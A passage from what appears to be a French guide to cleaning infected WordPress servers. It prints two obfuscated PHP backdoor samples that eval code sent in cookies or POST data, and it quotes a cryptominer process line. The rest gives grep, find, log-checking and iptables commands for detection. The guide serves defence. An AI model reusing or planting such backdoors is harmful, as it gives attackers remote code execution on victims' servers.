@$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]]($v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]]($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]]($x24294), $r73534bfb));if (isset($x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]) && $sbb18==$x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]){if ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][34]){$v3970 = Array($v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17] => @$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]](),$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][17] => $v048a['e7a5745b2'][56].$v048a['e7a5745b2'][21].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56],);echo @$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]]($v3970);}elseif ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][4]){eval\/*ifd841*\/($x24294[$v048a['e7a5745b2'][68]]);}exit();} ?><\/pre>\n
en plus simple :<\/p>\n
<?php $p5dQxlL = array(8660, 185, 6556, 64, 6770, 183, 2842, 158, 5462, 182, 13540, 186, 7538, 178, 12903, 122, 11598, 108, 6269, 89, 4100, 161, 682, 102, 6077, 41, 1022, 153, 4629, 88, 5818, 109, 6953, 183, 1771, 114, 11125, 97, 3000, 42, 9736, 187, 3761, 164, 12707, 196, 847, 114, 4355, 153, 1175, 129, 7136, 93, 6192, 77, 3290, 176, 5124, 151, 8045, 179, 2671, 74, 12185, 176, 8224, 73, 467, 69, 92, 190, 8845, 187, 536, 146, 10796, 149, 10945, 81, 10271, 155, 13195, 177, 7229, 121, 8297, 173, 9165, 164, 1885, 93, 7350, 188, 12137, 48, 11463, 135, 3925, 175, 784, 63, 13025, 170, 4828, 55, 12530, 77, 4508, 121, 11917, 56, 2156, 122, 9923, 160, 1647, 124, 4717, 111, 5275, 187, 10694, 102, 2278, 191, 5927, 150, 12075, 62, 12027, 48, 0, 92, 9519, 158, 4261, 94, 11026, 99, 6118, 74, 7716, 194, 10524, 170, 13372, 168, 10143, 41, 4883, 146, 11706, 74, 3466, 146, 2469, 123, 1304, 154, 11222, 125, 11347, 116, 9474, 45, 5644, 174, 6667, 103, 8470, 190, 282, 185, 10083, 60, 3170, 120, 2745, 97, 3042, 128, 11973, 54, 2592, 79, 5029, 95, 961, 61, 9677, 59, 6358, 198, 9329, 145, 1588, 59, 11780, 137, 13726, 158, 12607, 100, 3612, 149, 1458, 130, 10184, 87, 9032, 133, 7952, 93, 10426, 98, 1978, 178, 6620, 47, 12361, 169, 7910, 42);\r\n$FY52xy = \"\";\r\nfor ($tWqBxTpk = 0;$tWqBxTpk < sizeof($p5dQxlL);$tWqBxTpk+= 2) {\r\n    if ($tWqBxTpk % 4) {\r\n        $FY52xy.= substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]);\r\n    } else {\r\n        $FY52xy.= $jaNwcmT(substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]));\r\n    }\r\n};\r\nif (!isset($jcRQ6i)) return $FY52xy;<\/pre>\n
 <\/p>\n
Vous noterez que les malwares ont toujours besoin de la fonction GLOBAL qui est l’indicateur que nous utilisons le plus souvent :<\/p>\n
<?php $tb78 = 506;\r\n$GLOBALS['fb355e'] = Array();\r\nglobal $fb355e;\r\n$fb355e = $GLOBALS;\r\n$ {\r\n    \"GLOBALS\"\r\n}\r\n['l82418'] = \"ozMBYu4A<\"TnPRx ~ I ^ bk_O5 & HU\\x9JW\r\n} > w$\\xa ? \/;\r\nNm, GyVj0F[ = 1q % Dl9) de@]c782\\ : (6f\\xdv + #KsZS|p'-!gaXL3E*Cr`.{tQhi\";$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]] = $fb355e['l82418'][60].$fb355e['l82418'][96].$fb355e['l82418'][90];$fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]] = $fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][56];$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]] = $fb355e['l82418'][74].$fb355e['l82418'][94].$fb355e['l82418'][90].$fb355e['l82418'][53].$fb355e['l82418'][57].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]] = $fb355e['l82418'][97].$fb355e['l82418'][11].$fb355e['l82418'][97].$fb355e['l82418'][21].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]] = $fb355e['l82418'][78].$fb355e['l82418'][96].$fb355e['l82418'][78].$fb355e['l82418'][70].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][74].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]] = $fb355e['l82418'][5].$fb355e['l82418'][11].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]] = $fb355e['l82418'][18].$fb355e['l82418'][83].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][67].$fb355e['l82418'][6].$fb355e['l82418'][21].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][0].$fb355e['l82418'][56].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][97].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]] = $fb355e['l82418'][32].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][61].$fb355e['l82418'][6];$fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]] = $fb355e['l82418'][19].$fb355e['l82418'][23].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][60];$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] = $_POST;$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] = $_COOKIE;@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82], NULL);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][74], 0);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][39].$fb355e['l82418'][83].$fb355e['l82418'][14].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][14].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][5].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57], 0);@$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]](0);$u604d9662 = NULL;$r5401375 = NULL;$fb355e[$fb355e['l82418'][1].$fb355e['l82418'][18].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][57].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][18]] = $fb355e['l82418'][6].$fb355e['l82418'][54].$fb355e['l82418'][62].$fb355e['l82418'][56].$fb355e['l82418'][45].$fb355e['l82418'][18].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][80].$fb355e['l82418'][56].$fb355e['l82418'][54].$fb355e['l82418'][23].$fb355e['l82418'][61].$fb355e['l82418'][80].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][86].$fb355e['l82418'][67].$fb355e['l82418'][80].$fb355e['l82418'][83].$fb355e['l82418'][23].$fb355e['l82418'][45].$fb355e['l82418'][56].$fb355e['l82418'][80].$fb355e['l82418'][63].$fb355e['l82418'][61].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][86].$fb355e['l82418'][45].$fb355e['l82418'][45].$fb355e['l82418'][68].$fb355e['l82418'][54];global $zbdee44b;function  k547c($u604d9662, $c2fe6404){global $fb355e;$ue9100 = \"\";for ($f231=0; $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662);){for ($s9716d=0; $s9716d<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($c2fe6404) && $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662); $s9716d++, $f231++){$ue9100 .= $fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]]($fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($u604d9662[$f231]) ^ $fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($c2fe6404[$s9716d]));}}return $ue9100;}function  w1c974($u604d9662, $c2fe6404){global $fb355e;global $zbdee44b;return $fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($u604d9662, $zbdee44b), $c2fe6404);}foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}if (!$u604d9662){foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}}$u604d9662 = @$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]]($fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]]($fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]]($u604d9662), $r5401375));if (isset($u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]) && $zbdee44b==$u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]){if ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][97]){$f231 = Array($fb355e['l82418'][78].$fb355e['l82418'][70] => @$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]](),$fb355e['l82418'][74].$fb355e['l82418'][70] => $fb355e['l82418'][49].$fb355e['l82418'][92].$fb355e['l82418'][45].$fb355e['l82418'][80].$fb355e['l82418'][49],);echo @$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]]($f231);}elseif ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][57]){eval\/*b1e3a6fe*\/($u604d9662[$fb355e['l82418'][56]]);}exit();}\r\n ?>\r\n<\/pre>\n
 <\/p>\n
Ainsi m\u00eame si cette fonction est la plus commune nous recommandons la commande suivante pour d\u00e9celer les malwares :<\/p>\n
grep -r -i --include=\\*.php '$GLOBALS' \/var\/www\/wordpress\/<\/pre>\n
Les r\u00e9sultats seront certes nombreux mais avec ce spectre large vous pourrez analyser minutieusement les r\u00e9sultats pour y d\u00e9celer des malwares chiffr\u00e9s. Vous pouvez \u00e9galement utiliser un scanner tiers tel celui-ci<\/a> pour automatiser ces requ\u00eates mais qui ne sont pas aussi fiables qu’une analyse manuelle.<\/p>\n
 <\/p>\n
N’h\u00e9sitez pas \u00e0 nous contacter si les logs sont trop fournis ou que vous avez un doute sur certains fichiers !<\/strong><\/p>\n
 <\/p>\n
 <\/p>\n
Affichez les fichiers modifi\u00e9s ces derni\u00e8res 24h<\/h3>\n
find \/var\/www\/wordpress\/ -mtime -1 -ls<\/pre>\n
Le \u00ab\u00a0-1\u00a0\u00bb ici permet de r\u00e9cup\u00e9rer les fichiers modifi\u00e9s il y a un jour ou moins. Si vous le modifiez en \u00ab\u00a0+1\u00a0\u00bb, cela affichera les fichiers modifi\u00e9s il y a un jour ou plus. Si vous ne mettez aucun signe devant le \u00ab\u00a01\u00a0\u00bb, alors cela affichera les fichiers modifi\u00e9s uniquement il y a jour.<\/p>\n
 <\/p>\n
Une fois le m\u00e9nage fait, refaites les commandes suivantes pour vous assurer qu’il ne reste plus rien :<\/p>\n
 <\/p>\n
D\u00e9tectez les shells cach\u00e9s dans des .ico<\/h3>\n
grep -r -i --include=*.ico 'preg_replace' \/var\/www\/wordpress\/<\/pre>\n
 <\/p>\n
D\u00e9celez les shells injecteurs<\/h3>\n
grep -r -i --include=*.php '*\/ @include' \/var\/www\/wordpress\/\r\n<\/pre>\n
 <\/p>\n
D\u00e9celez un processus suspect<\/h3>\n
htop\r\n<\/pre>\n
Cette commande affiche toute la liste des processus en cours sur votre serveur. Cherchez dans la liste un processus suspect puis tuez le avec F9, exemple de processus suspect, ici un mineur bitcoin (votre serveur mine des btc pour un tiers attaquant) :<\/p>\n
500      56885  198  0.1  69408  8028 ?        Sl   Sep23 5940:27 .\/cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k<\/pre>\n
 <\/p>\n
V\u00e9rifiez les logs du serveur<\/h2>\n
Afin de vous assurer que personne d’autre ne d\u00e9tient les acc\u00e8s \u00e0 votre serveur ou qu’aucune requ\u00eate suspecte n’est effectu\u00e9e, il convient d’analyser les logs de votre serveur.<\/p>\n
 <\/p>\n
Analysez les derni\u00e8res connexions au SSH<\/h3>\n
Pour v\u00e9rifier qui s’est connect\u00e9 \u00e0 votre serveur SSH derni\u00e8rement, vous pouvez utiliser les commandes suivantes :<\/p>\n
last\r\ncat \/var\/log\/auth.log<\/pre>\n
Vous pourrez d\u00e8s lors trouver des tentatives d’acc\u00e8s non autoris\u00e9s et bloquer les adresses IP en question.<\/p>\n
 <\/p>\n
V\u00e9rifiez les logs du serveur web<\/h3>\n
Qu’il s’agisse d’Apache ou Nginx, votre serveur web doit enregistrer des logs. Si ce n’est pas le cas, pensez \u00e0 modifier votre configuration. Selon votre configuration, ces logs peuvent enregistrer de nombreuses informations en dehors des erreurs : c’est ce qu’il faudra inspecter.<\/p>\n
Les logs se situent en g\u00e9n\u00e9ral dans :<\/p>\n
\/var\/log\/<\/pre>\n
Vous pouvez vous rendre dans ce dossier et lancer un :<\/p>\n
ls -ltr<\/pre>\n
Afin d’afficher de bas en haut les logs ayant \u00e9t\u00e9s modifi\u00e9s le plus r\u00e9cemment et v\u00e9rifier leur contenu.<\/p>\n
Regardez aussi quels ips reviennent souvent et effectuent des actions louches comme des requ\u00eates POST vers les fichiers .ico et .php v\u00e9rol\u00e9s puis bannissez les avec iptable :<\/p>\n
iptables -I INPUT -s IPDUCOUPABLE -j DROP\r\n<\/pre>\n
 <\/p>\n
 <\/p>\n
Que faire apr\u00e8s une d\u00e9sinfection ?<\/h2>\n
On ne le dira jamais assez donc nous allons le r\u00e9p\u00e9ter : lorsque vous aurez termin\u00e9 de nettoyer votre site, il faudra penser \u00e0 effectuer 3 petites \u00e9tapes :<\/p>\n